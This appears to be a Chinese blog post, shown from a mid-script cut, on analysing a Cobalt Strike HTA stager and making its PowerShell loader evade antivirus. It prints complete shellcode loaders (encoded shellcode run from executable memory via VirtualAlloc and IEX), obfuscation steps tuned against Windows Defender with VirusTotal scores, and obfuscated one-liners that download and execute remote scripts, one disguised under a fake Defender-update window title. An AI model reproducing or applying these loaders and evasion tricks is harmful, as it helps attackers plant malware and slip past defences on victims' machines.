	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuAPCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMeXZPYiMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3dRSkdGTVcMFg0TCgNvYWFxbHRwZnEuKSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBmNic3gXfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEBoNEhMVDRITFw0SEBQjIyMjIw==')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

分别用Windows Defender测试每一段代码,发现在$var_code中报毒
进一步对$var_code解码(我本地base64解出来都是乱码,挺怪的)
看别人的结果说能得到一串ASCII字符,而ASCII解码后得到一堆乱码,但在最后,可以发现攻击者的IP,也没什么其他可以获取的信息了

总的来说 powershell的上线方式就是通过VirtualAlloc分配内存然后执行CS的shellcode,shellcode存放在了$var_code变量中

powershell免杀

工具的使用

通过对上面hta文件的分析之后,我们知道Windows Defender是对$var_code进行了检测报毒,那我们需要做的就是将该部分进行混淆处理,来绕过Windows Defender的检测
这里先推荐一个开源的混淆工具Invoke-Obfuscation

1
2
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

根据其步骤安装,运行

好酷炫的界面

因为没有仔细去研究该工具的使用方法,就直接用的其他大佬的配置
Set scriptblock 'final_base64payload' COMPRESS 1,该配置可以绕过Windows Defender,(也可以选择其他混淆方式来绕过不同的防火墙)该工具会根据该配置输出可以绕过Windows Defender的PowerShell命令

Out d:payload.ps1将其输出
得到payload.ps1
将其新建的有效载荷替换掉$var_code中的内容,Windows Defender成功绕过

接着我们把他丢到virustotal上看看效果


虽然可以绕过一些大厂的防火墙,例如:微软,腾讯,McAfee
但是16/59 感觉还是不太行那我们接下来试试手动免杀

人工免杀

我们直接用CS生成一个powershell的payload,不然用之前hta中包含的话,几层base64又压缩啥的太麻烦了
先来看看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktTjiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMV0saZCMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNExgDbmJwYQouKSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBmNicyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMSDRIQEQ0RERQNEREUIyMjIyM=')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

与之前的一样,我们需要添加混淆的还是$var_code
思路是将base64编码换掉,因为base64编码会被杀掉,改成byte数组

这可能就是传说中的FromBase65String?
$var_code改掉

1
[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,83,142,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,87,75,26,100,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,24,3,110,98,112,97,10,46,41,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,18,13,18,16,17,13,17,17,20,13,17,17,20,35,35,35,35,35)

现在再拿到virustotal上面去看看

离大谱,32/59不得不说,安全厂商估计也是天天在网上学习新的免杀方式

这里参考了Y4er师傅的处理方法,主要部分就是更改了关键字,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Set-StrictMode -Version 2

$DoIt = @'
function func_b {
	Param ($amodule, $aprocedure)		
	$aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods')
	$agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure))
}

function func_a {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters,
		[Parameter(Position = 1)] [Type] $areturn_type = [Void]
	)

	$atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed')
	$atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')

	return $atype_b.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,83,142,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,87,75,26,100,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,24,3,110,98,112,97,10,46,41,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,120,23,127,115,121,123,22,23,11,115,125,10,20,96,96,10,20,94,7,102,106,96,98,113,14,112,119,98,109,103,98,113,103,14,98,109,119,106,117,106,113,118,112,14,119,102,112,119,14,101,106,111,102,2,7,107,8,107,9,35,22,108,2,115,6,99,98,115,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,18,13,18,16,17,13,17,17,20,13,17,17,20,35,35,35,35,35)

for ($x = 0; $x -lt $acode.Count; $x++) {
	$acode[$x] = $acode[$x] -bxor 35
}

$ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)

$arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void])))
$arunme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	i`ex $DoIt
}

我们再放到virustotal上面试试

28/60,也就多绕过了4个防火墙
还是太菜了,手动的话,大概就这样了,下面贴一下在执行远程执行脚本时代码混淆,直接执行cs生成的语句杀软拦截的混淆操作

  1. 使用Replace替换关键字部分字母,加上通过拆分后重新组合
    powershell.exe -nop -w hidden -c "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://0.0.0.0:4545/text.txt'')'.Replace('123','adString');IEX ($c1+$c2)"

  2. 使用powershell语言的特性来混淆代码

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"

管道输入流:

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

利用环境变量:

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&cmd /c echo %cmd%|powershell -

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ((Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value)

从其他进程获取参数:

cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR https://7ell.me/power)&& FOR /L %i IN (1,1,1000) DO echo"

参考文章:
https://mp.weixin.qq.com/s/TtKEnmUbtVMSqBCgrSj2Qw

免杀
#免杀
CS生成hta分析与powershell免杀
https://glacierrrr.online/2022/08/16/CS生成hta分析与powershell免杀/
作者
Glacier
发布于
2022年8月16日
许可协议